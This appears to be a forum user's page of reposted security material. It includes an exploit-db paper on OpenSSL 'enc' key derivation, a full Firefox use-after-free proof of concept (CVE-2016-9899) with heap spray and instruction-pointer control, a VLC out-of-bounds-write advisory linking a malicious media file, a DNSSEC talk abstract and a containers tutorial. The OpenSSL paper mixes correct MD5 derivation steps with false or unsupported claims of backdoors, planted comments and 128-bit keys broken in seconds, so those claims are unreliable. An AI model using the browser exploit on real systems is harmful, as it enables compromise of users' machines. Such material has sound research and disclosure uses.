Everything posted by Nytro
I'm glad more people are in here now. It gets much, much worse than this. The post below literally says "if you have the password, you can generate the key and open the file." The real exploit is that you don't need the password or the key to open a file. That is how serious this is. It is really bad. It is not a joke.

Some of you are joining now and seeing how bad the weak KDF is that they're using. It gets much worse. The salt is not a random number. It is a side channel that leaks information about the passphrase. This reduces the entropy of the search space, so that it now becomes possible to brute force.

The REAL exploit is what's going on with memory management. The ENGINE plugin literally modifies the code during the compile, so what you think it's doing isn't what's being done. It's one of the most insane things I've ever seen in my life. You can see it if you compile and then decompile the code. It's basically the same thing they did with Heartbleed, but on steroids. Same exact design pattern. Memory management is so thoroughly skewered that you might as well think of the entire thing as a secret data structure.

If you really want to see what is happening here, just go look in the random number generator. It is not random. They do all sorts of stuff in the entropy pool to make it look like the time, date, process id, etc. are all involved. Then they clear the buffer in a call to ENGINE (!!) which throws all of that out and pops stuff off of the secret data structure. There are race conditions in the entropy pool. There are actually even comments telling you this. There is a comment in the entropy pool saying something like, "we are not ambitious to provide *information-theoretic* randomness." Or, translated into plain English, "I am a contractor who is trying to warn people the random number generator is not random."
There are times when they even have comments in the code telling people not to worry about valgrind complaining that uninitialized memory is being used to seed the buffer. Again, translated into plain English: "I am a contractor, and you should definitely worry about this." There is, I swear to god, a comment right in the decrypt function that basically says "PADDING ORACLE HERE." It is insane. They didn't even take it out. The whole thing is ruined. If you are just tuning in now, read the writeup posted before. Seriously, you are in for a hell of a ride.

-------------------------------------------------------------------------------------------

# One error and one missing step in 5) have been corrected.
# Procedure now 100% verified

You can actually get the full key. This is how it works:

    first half of the key  = MD5(password + salt)
    second half of the key = MD5(first half + password + salt)
    full key               = first half + second half

Let's prove this step by step.

    openssl enc -aes-256-cbc -p -in 000svgLA.7z -out test.aes -salt -k p@ssword
    salt=596C09F4AFCC2B9D
    key=DD73502243215E39A0CDDE52CF5AB975EAA8F8DA936B35650308113E42DF8862
    iv =322ACE8546EBA994AF17A1BC5DC999B1

We want to get that key value. Let's do it.

1.) Save the salt:

    perl -e 'print pack "H*", "596C09F4AFCC2B9D"' > salt

2.) Save the password:

    echo -n p@ssword > keyhalf

3.) Append the salt (password+salt):

    cat salt >> keyhalf

4.) Get the first half of the key:

    md5sum keyhalf
    dd73502243215e39a0cdde52cf5ab975  keyhalf

Compare to the full key:

    DD73502243215E39A0CDDE52CF5AB975 EAA8F8DA936B35650308113E42DF8862

Checks out. So now we need the rest. We can easily get it with the information we have so far, since we now know that the second half is MD5(first half + password + salt).

5.) Save the part of the key we already have:

    perl -e 'print pack "H*", "DD73502243215E39A0CDDE52CF5AB975"' > key
    echo -n p@ssword > password
    cat key > keysecond

6.) Append the password:

    cat password >> keysecond

7.) Append the salt:

    cat salt >> keysecond

8.)
Get the second half of the key:

    md5sum keysecond
    eaa8f8da936b35650308113e42df8862  keysecond

Compare to the second half:

    EAA8F8DA936B35650308113E42DF8862

In step 4.) we got dd73502243215e39a0cdde52cf5ab975
In step 8.) we got eaa8f8da936b35650308113e42df8862

    dd73502243215e39a0cdde52cf5ab975 eaa8f8da936b35650308113e42df8862
    DD73502243215E39A0CDDE52CF5AB975 EAA8F8DA936B35650308113E42DF8862

We have the full key. We only used MD5 and didn't write a single line of code. Note that this is the current version of OpenSSL. There is no patch that can fix the files that have already been encrypted. RIP OpenSSL.

------------------------------------------------------

this is crazy...

------------------------------------------------------

>the first 16 bytes of the key will be equal to MD5(password||salt)

Let's test this.

    openssl enc -aes-256-cbc -pass pass:p@ssword -p -in 000svgLA.7z -out testfile.aes
    salt=C532A7E7BFFBAD69
    key=9104D17FB6C06D9B0F8368D52678FD4B88DF2E244029BF068EED22DD816A5DBC
    iv =B08DB48DCF6CAC52C6CF040FB06A0809

    python pwdsalt2key.py 'p@ssword' 'C532A7E7BFFBAD69'
    9104D17FB6C06D9B0F8368D52678FD4B

    9104D17FB6C06D9B0F8368D52678FD4B88DF2E244029BF068EED22DD816A5DBC

pwdsalt2key.py:
http://gateway.glop.me/ipfs/QmbYCbZYsViLSAy7ht6iNpecyCeoTWBonsLPtHDa6bX6Ku/pwdsalt2key.py
https://zerobin.net/?7ff571d39efdcd1c#uBSr6l6vCFq1EA95h3SQSmK4KVN9rAlMx/58uGRgN0o=

    import sys
    from passlib.utils.pbkdf2 import pbkdf1
    from binascii import unhexlify, hexlify

    pwd = str(sys.argv[1])
    salt = str(sys.argv[2])
    out = pbkdf1(pwd, unhexlify(b'' + salt), 1, 16, 'md5')
    print hexlify(out).decode('ascii').upper()

------------------------------------------------------

*********************************************************************
ORACLE:
https://blog.cloudflare.com/yet-another-padding-oracle-in-openssl-cbc-ciphersuites/
https://github.com/FiloSottile/CVE-2016-2107

Explanation: https://blog.cloudflare.com/yet-another-padding-oracle-in-openssl-cbc-ciphersuites/
Code:
https://github.com/FiloSottile/CVE-2016-2107
Internal discussion: https://www.openssl.org/news/secadv/20160503.txt
Exploit: https://www.exploit-db.com/exploits/39768/
Damage control: http://web-in-security.blogspot.ca/2016/05/curious-padding-oracle-in-openssl-cve.html
'Fix': https://git.openssl.org/?p=openssl.git;a=commitdiff;h=68595c0c2886e7942a14f98c17a55a88afb6c292;hp=643e8e972e54fa358935e5f8b7f5a8be9616d56b
Compiled information: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2107

*********************************************************************
BLOCKS AND SIZE: (ls -l, head -c 256)

There is also this weird comment in enc.c, line 431:

    /*
     * zero the complete buffer or the string passed from the command
     * line bug picked up by Larry J. Hughes Jr. <hughes@indiana.edu>
     */
    if (str == strbuf)
        OPENSSL_cleanse(str, SIZE);
    else
        OPENSSL_cleanse(str, str_len);

The memcpy() routine is explicitly not safe if the source and destination buffers overlap. This can happen when the EVP_enc_null() cipher is used to decrypt text longer than BUF_OFFSET bytes, because of this code in bio_enc.c:

    EVP_CipherUpdate(&(ctx->cipher),
                     (unsigned char *)ctx->buf, &ctx->buf_len,
                     (unsigned char *)&(ctx->buf[BUF_OFFSET]), i);

It's the overwrite of the ctx->buf memory that is the problem. Saw this on a SUSE 12 SP2 machine. It is not necessarily repeatable on other machines. Valgrind also complained.
https://github.com/openssl/openssl/issues/1935

You should use EVP_ENCODE_LENGTH to determine the required output buffer size:
https://github.com/openssl/openssl/blob/master/include/openssl/evp.h#L458

*********************************************************************
MEMORY: (https://www.hex-rays.com/products/decompiler/)

>Mem allocator isn't actually an allocator, it's a LIFO system that allows the devs to be sloppy and access "already free()d memory". I notice that they alloc in EVP_BytesToKey, whereas LibreSSL does not.
>double free
https://github.com/guidovranken/openssl-x509-vulnerabilities
http://seclists.org/fulldisclosure/2016/Oct/62

There are many other instances of double frees in the code.

*********************************************************************
3SAT: (https://github.com/msoos/cryptominisat)
(http://baldur.iti.kit.edu/sat-competition-2016/solvers/main/)

>You need to do a linear correlation attack on the bit vectors and other annoying things. You can reduce entropy down to 64+32 bits and then it's within brute-force range with an ASIC.
>For a 3-SAT solver you just download one off of GitHub. There are dozens.
>The problem is getting the MD5 and AES circuit into 3-SAT, CNF form. You may need to take the C code for the decryption functions and MD5 hashing functions, then compile it to Verilog. See if there is a way.
>You have to represent the hash function as a circuit in CNF.
>128 bit is breakable in 40 seconds with a 3-SAT attack. It's not breakable with brute force.

*********************************************************************
MD5 PBKDF1: (http://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-passwords/)
(https://github.com/qsantos/rainbow)

>"The first 16 bytes are actually derived using PBKDF1 as defined in PKCS#5 v1.5. The next 16 bytes would be MD5(PBKDF1(PASSWORD, SALT) || PASSWORD || SALT) and the IV would be MD5(MD5(PBKDF1(PASSWORD, SALT) || PASSWORD || SALT) || PASSWORD || SALT)"
>PBKDF1(PASSWORD, SALT) = MD5(PASSWORD || SALT), where || is concatenation

^^There is an idea that this decimates the entropy to 2^128, assuming passphrases hash to distinct MD5 values. However, it's tricky, because you have to find the right preimage to compute the full key, as well as the IV. However, if you have some way to identify that you have the first 128 bits right, then finding collisions for it is easy, since a collision attack on MD5 exists. Either way, this is pretty weak and it's crazy that it's there.
>EVP_BytesToKey uses an outrageously weak KDF (basically MD5, salted and iterated a couple of times), and drops the effective entropy down to at most 128 bits.

>The process by which the password and salt are turned into the key and IV is not documented, but a look at the source code shows that it calls the OpenSSL-specific EVP_BytesToKey() function, which uses a custom key derivation function with some repeated hashing. This is a non-standard and not-well-vetted construct (!) which relies on the MD5 hash function of dubious reputation (!!); that function can be changed on the command line with the undocumented -md flag (!!!); the "iteration count" is set by the enc command to 1 and cannot be changed (!!!!). This means that the first 16 bytes of the key will be equal to MD5(password||salt), and that's it.

>I will tell you a secret.
>To decrypt the insurance file. Make sure to archive this before it disappears.
>The EVP_BytesToKey key derivation algorithm uses MD5. It is trivial to break the key for the first block.

*********************************************************************
CONTENT: (binwalk, diff, comm, head/tail -c)

>See if the filename, file contents, or choice of key or IV changes the salt. (I believe I saw the key choice did not change the salt.)

Download: http://gateway.glop.me/ipfs/QmZudb4s2nF5JgdeFA1nKzs6MtvaPr58rR4LzddZqYir3s/evp_test.py

It recreates EVP_BytesToKey completely outside of OpenSSL.
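In the same spirit, the construction quoted above can be reproduced with nothing but the standard library. A minimal sketch (assuming MD5, iteration count 1, and a 32-byte key plus 16-byte IV, which is what `openssl enc -aes-256-cbc` used by default at the time of this writeup):

```python
import hashlib

def evp_bytes_to_key(password, salt, key_len=32, iv_len=16):
    # MD5-based EVP_BytesToKey with iteration count 1:
    #   D_1 = MD5(password || salt)
    #   D_n = MD5(D_{n-1} || password || salt)
    # key || iv is the concatenation of the D_i, truncated to the needed length.
    d = b""
    prev = b""
    while len(d) < key_len + iv_len:
        prev = hashlib.md5(prev + password + salt).digest()
        d += prev
    return d[:key_len], d[key_len:key_len + iv_len]

password = b"p@ssword"
salt = bytes.fromhex("596C09F4AFCC2B9D")
key, iv = evp_bytes_to_key(password, salt)
# Should reproduce the key= and iv= lines openssl printed in the walkthrough above.
print("key =", key.hex().upper())
print("iv  =", iv.hex().upper())
```

Note how the loop makes the "first half = MD5(password||salt), second half = MD5(first half||password||salt)" structure from the walkthrough fall out automatically, and also yields the IV as the third MD5 block.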
Example:

    python evp_test.py md5 'p@ssword' '64 97 22 63 0B 61 9D 74'
    salt=649722630B619D74
    key=F6EEA040C6BDD0EF1429C4CF4FE09FD3EA1C9BDE96B6B41DBFF838E408628BBE
    iv=576F54891CADC222492E038F8ECE557A

*********************************************************************
AES: (http://www.lifl.fr/~bouillag/implementation.html)
http://gateway.glop.me/ipfs/QmUUm47AkBuv2atQVLBPjTrVhaXQRDj9bNTqErkaP2TNwB/papers.zip
http://gateway.glop.me/ipfs/QmZHXz3g6LBNGYknFMLZbtdTawTNDt8dQByauk5fmFLb2k/aestools.zip
https://mega.nz/#!cI9jUAoQ!VGJnhIlTU5YBhIXTNLBfhasER6qxfsD_ho3PO_U5oSs
https://mega.nz/#!0BN3lRYT!G172BViFAInD2gTOsyZOZ56zHC4nNA1DHHwP7RliT6U

If people are saying the first block of the insurance files contains "runs of zeros," then here's what that looks like. Suppose that AES(block, key) encrypts a block with a key. In CBC mode, the first ciphertext block satisfies:

    AES(plaintext ^ IV, key) = ciphertext

where ^ is XOR. Now: if the plaintext were ALL zeros, that would mean

    AES(0000000... ^ IV, key) = AES(IV, key) = ciphertext

But the IV and key are generated in completely deterministic fashion from the passphrase and the salt. And we have the salt. So that first equation really becomes

    F(passphrase) = ciphertext

for a certain F.
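That first-block identity holds for any block cipher in CBC mode, not just AES. A toy check of the algebra (the stand-in permutation below is just MD5 of key||block, NOT a real cipher; it only illustrates that a zero first block makes the first ciphertext block a deterministic function of key and IV):

```python
import hashlib

def E(block, key):
    # Stand-in for a block cipher's per-block encryption (NOT a real cipher).
    return hashlib.md5(key + block).digest()

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

key = b"k" * 32
iv = b"i" * 16
p1 = bytes(16)            # an all-zero first plaintext block

c1 = E(xor(p1, iv), key)  # CBC first block: C1 = E(P1 ^ IV, key)
assert c1 == E(iv, key)   # zero plaintext  => C1 = E(IV, key), as claimed above
print("zero first block => first ciphertext block depends only on key and IV")
```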
*********************************************************************

------------------------------------------------------

    openssl enc -aes-256-cbc -pass pass:p@ssword -p -d -in testfile.aes -out test1
    salt=2F140A2A667109B6
    key=460EBADE3CCC9AD2E6D223EB119435F947CC802044295EA90793AEC981AE3183
    iv =20E75E1E60ADF1C345E420EB9CD935BA

    openssl enc -aes-256-cbc -pass pass:WRONG_PASSWORD -p -d -in testfile.aes -out test2
    salt=2F140A2A667109B6
    key=C44D5867FFE37E08397DE9A4CC8058EAED59C20EB66759D7F78C960C2B91A200
    iv =5F5A6DFC5CCF0A50AD7502BD047076CE
    bad decrypt
    140687120832160:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:539:

    openssl enc -aes-256-cbc -pass pass:WRONG_PASSWORDxxxxxxx -p -d -in testfile.aes -out test2b
    salt=2F140A2A667109B6
    key=4D44D8C33DD754B64F460A69DA4E4F722678CBF04C44A03C7DB2B5AE4499C9E4
    iv =4EABEE050D7D4C29F83B7134BE9FDF21
    bad decrypt
    140683261372064:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:539:

    head -c 2560 testfile.aes > snippet

    openssl enc -aes-256-cbc -pass pass:p@ssword -p -d -in snippet -out test3
    salt=2F140A2A667109B6
    key=460EBADE3CCC9AD2E6D223EB119435F947CC802044295EA90793AEC981AE3183
    iv =20E75E1E60ADF1C345E420EB9CD935BA
    bad decrypt
    140591540508320:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:539:

    openssl enc -aes-256-cbc -pass pass:WRONG_PASSWORD -p -d -in snippet -out test4
    salt=2F140A2A667109B6
    key=C44D5867FFE37E08397DE9A4CC8058EAED59C20EB66759D7F78C960C2B91A200
    iv =5F5A6DFC5CCF0A50AD7502BD047076CE
    bad decrypt
    140213217490592:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:539:

    ls -l
    5083502 test1
    5083488 test2
    5083488 test2b
       2528 test3
       2528 test4

    strings test1 > s1
    strings test2 > s2
    strings test2b > s2b
    strings test3 > s3
    strings test4 > s4
    strings testfile.aes > as
    strings snippet > ss

    ls -l
    s1  352345
    s2  351306
    s2b 352104
    s3     153
    s4     156
    ss     186
    as  352191

    binwalk test1
    DECIMAL       HEXADECIMAL     DESCRIPTION
    --------------------------------------------------------------------------------
    0             0x0             7-zip archive data, version 0.3

    binwalk test2
    DECIMAL       HEXADECIMAL     DESCRIPTION
    --------------------------------------------------------------------------------

    binwalk test2b
    DECIMAL       HEXADECIMAL     DESCRIPTION
    --------------------------------------------------------------------------------

    binwalk test3
    DECIMAL       HEXADECIMAL     DESCRIPTION
    --------------------------------------------------------------------------------
    0             0x0             7-zip archive data, version 0.3

    binwalk test4
    DECIMAL       HEXADECIMAL     DESCRIPTION
    --------------------------------------------------------------------------------

    binwalk snippet
    DECIMAL       HEXADECIMAL     DESCRIPTION
    --------------------------------------------------------------------------------
    0             0x0             OpenSSL encryption, salted, salt: 0x2F140A2A667109B6

    binwalk testfile.aes
    DECIMAL       HEXADECIMAL     DESCRIPTION
    --------------------------------------------------------------------------------
    0             0x0             OpenSSL encryption, salted, salt: 0x2F140A2A667109B6

    head -c 8 test1
    7z'
    head -c 8 test2
    `@R
    head -c 8 test2b
    nZ
    head -c 8 test3
    7z'
    head -c 8 test4
    `@R

    tail -c 8 test1
    W[
    tail -c 8 test2
    a ܹ
    tail -c 8 test3
    !H\
    tail -c 8 test4
    O$
    tail -c 8 snippet
    (
    tail -c 8 testfile.aes
    sQ

    hachoir-subfile test1
    [+] Start search on 5083502 bytes (4.8 MB)
    [+] File at 0 size=5083502 (4.8 MB): Compressed archive in 7z format
    [+] File at 4139258 size=27418666 (26.1 MB): MS-DOS executable
    [+] End of search -- offset=5083502 (4.8 MB)

    hachoir-subfile test2
    [+] Start search on 5083488 bytes (4.8 MB)
    [+] File at 1605181 size=18645165 (17.8 MB): MS-DOS executable
    [+] File at 3773184 size=15678389 (15.0 MB): MS-DOS executable
    [+] File at 4786234 size=2034059 (1.9 MB): MS-DOS executable
    [+] End of search -- offset=5083488 (4.8 MB)

    hachoir-subfile test2b
    [+] Start search on 5083488 bytes (4.8 MB)
    [+] End of search -- offset=5083488 (4.8 MB)

    hachoir-subfile test3
    [+] Start search on 2528 bytes (2528 bytes)
    [+] File at 0 size=5083502 (4.8 MB): Compressed archive in 7z format
    [+] End of search -- offset=2528 (2528 bytes)

    hachoir-subfile test4
    [+] Start search on 2528 bytes (2528 bytes)
    [+] End of search -- offset=2528 (2528 bytes)

    hachoir-subfile snippet
    [+] Start search on 2560 bytes (2560 bytes)
    [+] End of search -- offset=2560 (2560 bytes)

    hachoir-subfile testfile.aes
    [+] Start search on 5083520 bytes (4.8 MB)
    [+] File at 1292169 size=18091181 (17.3 MB): MS-DOS executable
    [+] File at 3813667 size=11944255 (11.4 MB): MS-DOS executable
    [+] End of search -- offset=5083520 (4.8 MB)

------------------------------------------------------

Alright - the holidays are over. We laughed, we cried, we did lots of math. Time to finish the job and bring it all home. In this thread, we will start to make this concrete with OpenSSL.

Applying some of the ideas here, what we really want to do with OpenSSL is decrypt a file with a random key (or passphrase), and then let it fail. But, unfortunately, OpenSSL leaks "information" about why it fails (padding oracle, etc). So, if you test a bunch of random passwords, you can collect this leaked information and use it to narrow down the search space (!!!!) for the next round of tests.

THUS, YOU NEVER HAVE TO BRUTE FORCE THE ENTIRE SEARCH SPACE.

That is the big idea. You instead brute force a small random "representative sample" of the search space, gather the leaked information as a set of experimental "results," adjust your probability distribution (and as a result, the entropy) accordingly, use that to rule out HUGE sections of the search space in the next round of tests, then repeat and iterate towards a solution. Rather than try to re-derive the math here from scratch, let's try a concrete example.
The following 7z on archive.org is about 5 MB, completely public domain under CC0, and contains SVGs of all the Tic-Tac-Toe games (as used on Wikipedia):

Details: https://archive.org/details/000svgLA.7z
Direct download: https://archive.org/download/000svgLA.7z/000svgLA.7z

Now, so that we can ALL have the same file, simply do the following commands:

    $ wget https://archive.org/download/000svgLA.7z/000svgLA.7z
    ...
    $ openssl enc -aes-256-cbc -pass pass:p@ssword -S 2F140A2A667109B6 -p -in 000svgLA.7z -out testfile.aes
    salt=2F140A2A667109B6
    key=460EBADE3CCC9AD2E6D223EB119435F947CC802044295EA90793AEC981AE3183
    iv =20E75E1E60ADF1C345E420EB9CD935BA
    $ sha256sum -b testfile.aes
    b5210324b21f88e83601d8aa2b940622258c3aab459d9476570f9ec427157574 *testfile.aes

And now we're all on the same page here. The last line is just to confirm you have the right file.

So, now we want to take all of this stuff and do some tests. Here are three sample "bad decrypts" with the password set to "WRONG_PASSWORD":

    $ openssl enc -aes-256-cbc -pass pass:WRONG_PASSWORD -p -d -in testfile.aes -out testdecrypt.7z
    salt=2F140A2A667109B6
    key=C44D5867FFE37E08397DE9A4CC8058EAED59C20EB66759D7F78C960C2B91A200
    iv =5F5A6DFC5CCF0A50AD7502BD047076CE
    bad decrypt
    140341122025112:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:529:

    $ openssl enc -aes-256-cbc -pass pass:WRONG_PASSWORD -p -d -in testfile.aes -out testdecrypt.7z
    salt=2F140A2A667109B6
    key=C44D5867FFE37E08397DE9A4CC8058EAED59C20EB66759D7F78C960C2B91A200
    iv =5F5A6DFC5CCF0A50AD7502BD047076CE
    bad decrypt
    140164202464920:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:529:

    $ openssl enc -aes-256-cbc -pass pass:WRONG_PASSWORD -p -d -in testfile.aes -out testdecrypt.7z
    salt=2F140A2A667109B6
    key=C44D5867FFE37E08397DE9A4CC8058EAED59C20EB66759D7F78C960C2B91A200
    iv =5F5A6DFC5CCF0A50AD7502BD047076CE
    bad decrypt
    140193671071384:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:529:

Note the three numbers we get:

1. 140341122025112
2. 140164202464920
3. 140193671071384

You can see it's different every time, so some randomness is involved here. This number is, also, what the padding oracle is mysteriously spitting out. The question is, what the hell does this number mean, and how do we interpret these results?

Sursa: https://www.exploit-db.com/papers/41019/
<!DOCTYPE html>
<html>
<head>
<!-- <meta http-equiv="refresh" content="1"/> -->
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="0" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
<meta http-equiv="Pragma" content="no-cache" />
<style type="text/css">
body {
    background-color: lime;
    font-color: red;
};
</style>
<script type='text/javascript'></script>
<script type="text/javascript" language="JavaScript">
/*
 * Mozilla Firefox < 50.1.0 Use-After-Free POC
 * Author: Marcin Ressel
 * Date: 13.01.2017
 * Vendor Homepage: www.mozilla.org
 * Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/
 * Version: < 50.1.0
 * Tested on: Windows 7 (x64) Firefox 32 && 64 bit
 * CVE: CVE-2016-9899
 *************************************************
 * (b1c.5e0): Access violation - code c0000005 (first chance)
 * First chance exceptions are reported before any exception handling.
 * This exception may be expected and handled.
 * *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll -
 * eax=0f804c00 ebx=00000000 ecx=003be0c8 edx=4543484f esi=003be0e4 edi=06c71580
 * eip=6d7cc44c esp=003be0b8 ebp=003be0cc iopl=0         nv up ei pl nz na pe nc
 * cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
 * xul!mozilla::net::LoadInfo::AddRef+0x3dd41:
 * 6d7cc44c ff12            call    dword ptr [edx]      ds:002b:4543484f=????????
 * 0:000> dd eax
 * 0f804c00  4543484f 91919191 91919191 91919191
 * 0f804c10  91919191 91919191 91919191 91919191
 * 0f804c20  91919191 91919191 91919191 91919191
 * 0f804c30  91919191 91919191 91919191 91919191
 * 0f804c40  91919191 91919191 91919191 91919191
 * 0f804c50  91919191 91919191 91919191 91919191
 * 0f804c60  91919191 91919191 91919191 91919191
 * 0f804c70  91919191 91919191 91919191 91919191
 */

var doc = null;
var cnt = 0;

function m(blocks, size) {
    var arr = [];
    for (var i = 0; i < blocks; i++) {
        arr[i] = new Array(size);
        for (var j = 0; j < size; j += 2) {
            arr[i][j] = 0x41414141;
            arr[i][j+1] = 0x42424242;
        }
    }
    return arr;
}

function handler() { // free
    if (cnt > 0) return;
    doc.body.appendChild(document.createElement("audio")).remove();
    m(1024, 1024);
    ++cnt;
}

function trigger() {
    if (cnt > 0) {
        var pl = new Array();
        doc.getElementsByTagName("*")[0].removeEventListener("DOMSubtreeModified", handler, false);
        for (var i = 0; i < 4096; i++) { // replace
            pl[i] = new Uint8Array(1000);
            pl[i][0] = 0x4F;
            pl[i][1] = 0x48;
            pl[i][2] = 0x43;
            pl[i][3] = 0x45; // eip
            for (var j = 4; j < (1000) - 4; j++) pl[i][j] = 0x91;
            // pl[i] = document.createElement('media');
            // document.body.appendChild(pl[i]);
        }
        window.pl = pl;
        document.getElementById("t1").remove(); // re-use
    }
}

function testcase() {
    var df = m(4096, 1000);
    document.body.setAttribute('df', df);
    doc = document.getElementById("t1").contentWindow.document;
    doc.getElementsByTagName("*")[0].addEventListener("DOMSubtreeModified", handler, false);
    doc.getElementsByTagName("*")[0].style = "ANNNY";
    setInterval("trigger();", 1000);
}
</script>
<title>Firefox < 50.1.0 Use After Free (CVE-2016-9899)</title>
</head>
<body onload='testcase();'>
<iframe src='about:blank' id='t1' width="100%"></iframe>
</body>
</html>

Sursa: https://www.exploit-db.com/exploits/41042/
In modules/codec/adpcm.c, VLC can be made to perform an out-of-bounds write with user-controlled input. The function DecodeAdpcmImaQT at adpcm.c:595 allocates a buffer which is filled with bytes from the input stream. However, it does not check that the number of channels in the input stream is less than or equal to the size of the buffer, resulting in an out-of-bounds write. The number of channels is clamped at <= 5.

    adpcm_ima_wav_channel_t channel[2];
    ...
    for( i_ch = 0; i_ch < p_dec->fmt_in.audio.i_channels; i_ch++ )
    {
        channel[i_ch].i_predictor = (int16_t)((( ( p_buffer[0] << 1 )|( p_buffer[1] >> 7 ) ))<<7);
        channel[i_ch].i_step_index = p_buffer[1]&0x7f;
        ...

The mangling of the input p_buffer above and in AdpcmImaWavExpandNibble() makes this difficult to exploit, but there is a potential for remote code execution via a malicious media file.

POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41025.mov

Sursa: https://www.exploit-db.com/exploits/41025/
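The bug pattern is easy to see in miniature. A Python sketch of it (function and field names are hypothetical stand-ins, not VLC's actual code): the decoder keeps a two-slot channel array but trusts the stream's declared channel count, which is only clamped to 5. Python raises an IndexError at the point where the C code silently writes past the stack buffer:

```python
def decode_ima_qt_header(i_channels, p_buffer):
    # Mirrors `adpcm_ima_wav_channel_t channel[2]`: room for two channels only.
    channel = [{"i_predictor": 0, "i_step_index": 0} for _ in range(2)]
    i_channels = min(i_channels, 5)  # the clamp from the report: <= 5, not <= 2
    for i_ch in range(i_channels):   # missing check: i_channels <= len(channel)
        channel[i_ch]["i_predictor"] = ((p_buffer[0] << 1) | (p_buffer[1] >> 7)) << 7
        channel[i_ch]["i_step_index"] = p_buffer[1] & 0x7F
    return channel

decode_ima_qt_header(2, bytes([0x12, 0x34]))      # two channels: in bounds
try:
    decode_ima_qt_header(5, bytes([0x12, 0x34]))  # five channels overrun channel[2]
except IndexError:
    print("out-of-bounds write (IndexError here, stack corruption in the C code)")
```

The fix is the missing bounds check: reject or clamp the declared channel count to the size of the channel array before the loop.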
DNSSec Explained! Dan Benway BSides Columbus Ohio 2017

DNSSec is not yet widely deployed or well understood, but there is already a clear and present need for its use. Just like HTTPS, DNSSec is becoming more common, and will eventually become required. In this session I will diagrammatically show how DNSSec works. We'll look at DNS functionality, DNS referrals, spoofing and man-in-the-middle attacks, asymmetric key cryptography (public key cryptography), digital signatures, zone signing keys, key signing keys, DS records, and more.

Daniel L. Benway has been an IT professional since 1993, working in assistive technology, software development, enterprise infrastructure, and security. He holds a Bachelor of Science in Computer Science from The Thomas J. Watson School of Engineering and Applied Science at Binghamton University, as well as certifications from Microsoft, Cisco, CompTIA, and IBM/Lotus. Currently Daniel is an Active Directory, Windows infrastructure, and PKI specialist in Columbus, Ohio. You can learn more about Daniel from his IT blog or LinkedIn.

Sursa: http://www.irongeek.com/i.php?page=videos/bsidescolumbus2017/bsides-columbus09-dnssec-explained-dan-benway
Containers from Scratch

Posted on January 7, 2017

This is a write-up for a talk I gave at CAT BarCamp, an awesome unconference at Portland State University. The talk started with the self-imposed challenge "give an intro to containers without Docker or rkt."

Often thought of as cheap VMs, containers are just isolated groups of processes running on a single host. That isolation leverages several underlying technologies built into the Linux kernel: namespaces, cgroups, chroots and lots of terms you've probably heard before. So, let's have a little fun and use those underlying technologies to build our own containers.

On today's agenda:

setting up a file system
chroot
unshare
nsenter
bind mounts
cgroups
capabilities

Container file systems

Container images, the thing you download from the internet, are literally just tarballs (or tarballs in tarballs if you're fancy). The least magic part of a container are the files you interact with. For this post I've built a simple tarball by stripping down a Docker image. The tarball holds something that looks like a Debian file system and will be our playground for isolating processes.

    $ wget https://github.com/ericchiang/containers-from-scratch/releases/download/v0.1.0/rootfs.tar.gz
    $ sha256sum rootfs.tar.gz
    c79bfb46b9cf842055761a49161831aee8f4e667ad9e84ab57ab324a49bc828c  rootfs.tar.gz

First, explode the tarball and poke around.

    $ # tar needs sudo to create /dev files and setup file ownership
    $ sudo tar -zxf rootfs.tar.gz
    $ ls rootfs
    bin   dev  home  lib64  mnt  proc  run   srv  tmp  var
    boot  etc  lib   media  opt  root  sbin  sys  usr
    $ ls -al rootfs/bin/ls
    -rwxr-xr-x. 1 root root 118280 Mar 14  2015 rootfs/bin/ls

The resulting directory looks an awful lot like a Linux system. There's a bin directory with executables, an etc with system configuration, a lib with shared libraries, and so on. Actually building this tarball is an interesting topic, but one we'll be glossing over here.
For an overview, I'd strongly recommend the excellent talk "Minimal Containers" by my coworker Brian Redbeard.

chroot

The first tool we'll be working with is chroot. A thin wrapper around the similarly named syscall, it allows us to restrict a process' view of the file system. In this case, we'll restrict our process to the "rootfs" directory, then exec a shell. Once we're in there we can poke around, run commands, and do typical shell things.

    $ sudo chroot rootfs /bin/bash
    root@localhost:/# ls /
    bin   dev  home  lib64  mnt  proc  run   srv  tmp  var
    boot  etc  lib   media  opt  root  sbin  sys  usr
    root@localhost:/# which python
    /usr/bin/python
    root@localhost:/# /usr/bin/python -c 'print "Hello, container world!"'
    Hello, container world!
    root@localhost:/#

It's worth noting that this works because of all the things baked into the tarball. When we execute the Python interpreter, we're executing rootfs/usr/bin/python, not the host's Python. That interpreter depends on shared libraries and device files that have been intentionally included in the archive.

Speaking of applications, instead of a shell we can run one in our chroot.

    $ sudo chroot rootfs python -m SimpleHTTPServer
    Serving HTTP on 0.0.0.0 port 8000 ...

If you're following along at home, you'll be able to view everything the file server can see at http://localhost:8000/.

Creating namespaces with unshare

How isolated is this chrooted process? Let's run a command on the host in another terminal.

    $ # outside of the chroot
    $ top

Sure enough, we can see the top invocation from inside the chroot.

    $ sudo chroot rootfs /bin/bash
    root@localhost:/# mount -t proc proc /proc
    root@localhost:/# ps aux | grep top
    1000     24753  0.1  0.0 156636  4404 ?        S+   22:28   0:00 top
    root     24764  0.0  0.0  11132   948 ?        S+   22:29   0:00 grep top

Better yet, our chrooted shell is running as root, so it has no problem killing the top process.

    root@localhost:/# pkill top

So much for containment. This is where we get to talk about namespaces.
